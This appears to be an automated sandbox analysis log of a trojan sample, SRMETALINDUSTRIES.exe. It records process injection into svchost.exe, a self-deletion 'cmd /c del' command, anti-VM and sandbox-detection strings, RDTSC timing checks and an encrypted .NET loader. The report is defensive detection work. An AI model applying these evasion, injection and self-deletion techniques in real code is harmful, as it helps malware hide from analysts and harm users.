Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03469950 NtQueueApcThread,	9_2_03469950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03469560 NtWriteFile,	9_2_03469560
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03469520 NtWaitForSingleObject,	9_2_03469520
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0346AD30 NtSetContextThread,	9_2_0346AD30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034699D0 NtCreateProcessEx,	9_2_034699D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034695F0 NtQueryInformationFile,	9_2_034695F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0346B040 NtSuspendThread,	9_2_0346B040
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03469820 NtEnumerateKey,	9_2_03469820
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034698F0 NtReadVirtualMemory,	9_2_034698F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034698A0 NtWriteVirtualMemory,	9_2_034698A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_005A85D0 NtCreateFile,	9_2_005A85D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_005A8680 NtReadFile,	9_2_005A8680
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_005A8700 NtClose,	9_2_005A8700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_005A87B0 NtAllocateVirtualMemory,	9_2_005A87B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_005A85CA NtCreateFile,	9_2_005A85CA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_005A867C NtReadFile,	9_2_005A867C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_005A86FB NtClose,	9_2_005A86FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_005A87AC NtAllocateVirtualMemory,	9_2_005A87AC

Source: SRMETALINDUSTRIES.exe	Binary or memory string: OriginalFilename vs SRMETALINDUSTRIES.exe
Source: SRMETALINDUSTRIES.exe, 00000000.00000000.343837964.00000000003F2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameMemberIn.exe4 vs SRMETALINDUSTRIES.exe
Source: SRMETALINDUSTRIES.exe, 00000000.00000002.357083874.00000000037F9000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameCF_Secretaria.dll< vs SRMETALINDUSTRIES.exe
Source: SRMETALINDUSTRIES.exe, 00000000.00000002.356818988.0000000002807000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameEnvoySinks.dll6 vs SRMETALINDUSTRIES.exe
Source: SRMETALINDUSTRIES.exe	Binary or memory string: OriginalFilename vs SRMETALINDUSTRIES.exe
Source: SRMETALINDUSTRIES.exe, 00000004.00000002.421916752.00000000008D2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameMemberIn.exe4 vs SRMETALINDUSTRIES.exe
Source: SRMETALINDUSTRIES.exe, 00000004.00000002.423597861.000000000162F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs SRMETALINDUSTRIES.exe
Source: SRMETALINDUSTRIES.exe, 00000004.00000002.422684210.0000000000F66000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenamesvchost.exej% vs SRMETALINDUSTRIES.exe
Source: SRMETALINDUSTRIES.exe	Binary or memory string: OriginalFilenameMemberIn.exe4 vs SRMETALINDUSTRIES.exe

Source: SRMETALINDUSTRIES.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: SRMETALINDUSTRIES.exe

ReversingLabs: Detection: 20%

Source: SRMETALINDUSTRIES.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe 'C:\Users\user\Desktop\SRMETALINDUSTRIES.exe'
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Process created: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe C:\Users\user\Desktop\SRMETALINDUSTRIES.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SRMETALINDUSTRIES.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Process created: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SRMETALINDUSTRIES.exe'	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SRMETALINDUSTRIES.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/1@9/5

Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6832:120:WilError_01

Source: SRMETALINDUSTRIES.exe, Forms/mainForm.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.0.SRMETALINDUSTRIES.exe.3f0000.0.unpack, Forms/mainForm.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.SRMETALINDUSTRIES.exe.3f0000.0.unpack, Forms/mainForm.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 4.2.SRMETALINDUSTRIES.exe.8d0000.1.unpack, Forms/mainForm.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 4.0.SRMETALINDUSTRIES.exe.8d0000.0.unpack, Forms/mainForm.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: SRMETALINDUSTRIES.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SRMETALINDUSTRIES.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: SRMETALINDUSTRIES.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wntdll.pdbUGP source: SRMETALINDUSTRIES.exe, 00000004.00000002.423283417.000000000149F000.00000040.00000001.sdmp, svchost.exe, 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: SRMETALINDUSTRIES.exe, 00000004.00000002.423283417.000000000149F000.00000040.00000001.sdmp, svchost.exe
Source:	Binary string: svchost.pdb source: SRMETALINDUSTRIES.exe, 00000004.00000002.424002139.0000000001800000.00000040.00020000.sdmp
Source:	Binary string: svchost.pdbUGP source: SRMETALINDUSTRIES.exe, 00000004.00000002.424002139.0000000001800000.00000040.00020000.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: SRMETALINDUSTRIES.exe, Forms/mainForm.cs	.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.SRMETALINDUSTRIES.exe.3f0000.0.unpack, Forms/mainForm.cs	.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.SRMETALINDUSTRIES.exe.3f0000.0.unpack, Forms/mainForm.cs	.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.SRMETALINDUSTRIES.exe.8d0000.1.unpack, Forms/mainForm.cs	.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.SRMETALINDUSTRIES.exe.8d0000.0.unpack, Forms/mainForm.cs	.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Code function: 0_2_048004F1 push ebp; retf	0_2_048004F6
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Code function: 0_2_04802725 push 2EFFFFFFh; iretd	0_2_0480272A
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Code function: 4_2_0041B87C push eax; ret	4_2_0041B882
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Code function: 4_2_0041B812 push eax; ret	4_2_0041B818
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Code function: 4_2_0041B81B push eax; ret	4_2_0041B882
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Code function: 4_2_00412A95 pushfd ; retf	4_2_00412A96
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Code function: 4_2_00415BB5 push eax; retf	4_2_00415BBB
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Code function: 4_2_004186CA push edx; retn 0076h	4_2_004186CB
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Code function: 4_2_0040169B push es; iretd	4_2_0040169D
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Code function: 4_2_00414EA9 push es; ret	4_2_00414EAB
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Code function: 4_2_0041B7C5 push eax; ret	4_2_0041B818
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0347D0D1 push ecx; ret	9_2_0347D0E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_005AB87C push eax; ret	9_2_005AB882
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_005AB81B push eax; ret	9_2_005AB882
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_005AB812 push eax; ret	9_2_005AB818
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_005A2A95 pushfd ; retf	9_2_005A2A96
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_005A5BB5 push eax; retf	9_2_005A5BBB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_005A86CA push edx; retn 0076h	9_2_005A86CB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0059169B push es; iretd	9_2_0059169D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_005A4EA9 push es; ret	9_2_005A4EAB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_005AB7C5 push eax; ret	9_2_005AB818

Source: SRMETALINDUSTRIES.exe

Static PE information: 0xE74DE4BD [Sat Dec 20 20:02:05 2092 UTC]

Source: initial sample

Static PE information: section name: .text entropy: 7.20192556121

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete

Show sources

Source: C:\Windows\SysWOW64\svchost.exe	Process created: /c del 'C:\Users\user\Desktop\SRMETALINDUSTRIES.exe'
Source: C:\Windows\SysWOW64\svchost.exe	Process created: /c del 'C:\Users\user\Desktop\SRMETALINDUSTRIES.exe'			Jump to behavior

Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 00000000.00000002.356803030.0000000002802000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SRMETALINDUSTRIES.exe PID: 6164, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: SRMETALINDUSTRIES.exe, 00000000.00000002.356803030.0000000002802000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: SRMETALINDUSTRIES.exe, 00000000.00000002.356803030.0000000002802000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 00000000005985F4 second address: 00000000005985FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 000000000059898E second address: 0000000000598994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe TID: 5112	Thread sleep time: -38599s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe TID: 5632	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6980	Thread sleep time: -40000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe

Code function: 4_2_004088C0 rdtsc

4_2_004088C0

Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Thread delayed: delay time: 38599			Jump to behavior
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: explorer.exe, 00000005.00000000.387752965.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000005.00000000.387682336.00000000083EB000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000005.00000000.361556818.000000000461E000.00000004.00000001.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.368150630.0000000008653000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.384640624.00000000062E0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: SRMETALINDUSTRIES.exe, 00000000.00000002.356803030.0000000002802000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000005.00000000.387682336.00000000083EB000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
Source: SRMETALINDUSTRIES.exe, 00000000.00000002.356803030.0000000002802000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: SRMETALINDUSTRIES.exe, 00000000.00000002.356803030.0000000002802000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000005.00000000.384640624.00000000062E0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: SRMETALINDUSTRIES.exe, 00000000.00000002.356803030.0000000002802000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: explorer.exe, 00000005.00000000.402363762.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: SRMETALINDUSTRIES.exe, 00000000.00000002.356803030.0000000002802000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: SRMETALINDUSTRIES.exe, 00000000.00000002.356803030.0000000002802000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: SRMETALINDUSTRIES.exe, 00000000.00000002.356803030.0000000002802000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: SRMETALINDUSTRIES.exe, 00000000.00000002.356803030.0000000002802000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000005.00000000.402363762.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000005.00000000.387752965.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000005.00000000.441229219.000000000095C000.00000004.00000020.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G

Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe

Code function: 4_2_004088C0 rdtsc

4_2_004088C0

Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0342DB40 mov eax, dword ptr fs:[00000030h]	9_2_0342DB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0343EF40 mov eax, dword ptr fs:[00000030h]	9_2_0343EF40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034F8B58 mov eax, dword ptr fs:[00000030h]	9_2_034F8B58
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0342F358 mov eax, dword ptr fs:[00000030h]	9_2_0342F358
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0342DB60 mov ecx, dword ptr fs:[00000030h]	9_2_0342DB60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0343FF60 mov eax, dword ptr fs:[00000030h]	9_2_0343FF60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034F8F6A mov eax, dword ptr fs:[00000030h]	9_2_034F8F6A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03453B7A mov eax, dword ptr fs:[00000030h]	9_2_03453B7A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03453B7A mov eax, dword ptr fs:[00000030h]	9_2_03453B7A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034F070D mov eax, dword ptr fs:[00000030h]	9_2_034F070D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034F070D mov eax, dword ptr fs:[00000030h]	9_2_034F070D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0345A70E mov eax, dword ptr fs:[00000030h]	9_2_0345A70E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0345A70E mov eax, dword ptr fs:[00000030h]	9_2_0345A70E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0344F716 mov eax, dword ptr fs:[00000030h]	9_2_0344F716
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034E131B mov eax, dword ptr fs:[00000030h]	9_2_034E131B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034BFF10 mov eax, dword ptr fs:[00000030h]	9_2_034BFF10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034BFF10 mov eax, dword ptr fs:[00000030h]	9_2_034BFF10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03424F2E mov eax, dword ptr fs:[00000030h]	9_2_03424F2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03424F2E mov eax, dword ptr fs:[00000030h]	9_2_03424F2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0345E730 mov eax, dword ptr fs:[00000030h]	9_2_0345E730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034A53CA mov eax, dword ptr fs:[00000030h]	9_2_034A53CA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034A53CA mov eax, dword ptr fs:[00000030h]	9_2_034A53CA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034503E2 mov eax, dword ptr fs:[00000030h]	9_2_034503E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034503E2 mov eax, dword ptr fs:[00000030h]	9_2_034503E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034503E2 mov eax, dword ptr fs:[00000030h]	9_2_034503E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034503E2 mov eax, dword ptr fs:[00000030h]	9_2_034503E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034503E2 mov eax, dword ptr fs:[00000030h]	9_2_034503E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034503E2 mov eax, dword ptr fs:[00000030h]	9_2_034503E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0344DBE9 mov eax, dword ptr fs:[00000030h]	9_2_0344DBE9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034637F5 mov eax, dword ptr fs:[00000030h]	9_2_034637F5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034E138A mov eax, dword ptr fs:[00000030h]	9_2_034E138A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03431B8F mov eax, dword ptr fs:[00000030h]	9_2_03431B8F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03431B8F mov eax, dword ptr fs:[00000030h]	9_2_03431B8F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034DD380 mov ecx, dword ptr fs:[00000030h]	9_2_034DD380
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03452397 mov eax, dword ptr fs:[00000030h]	9_2_03452397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0345B390 mov eax, dword ptr fs:[00000030h]	9_2_0345B390
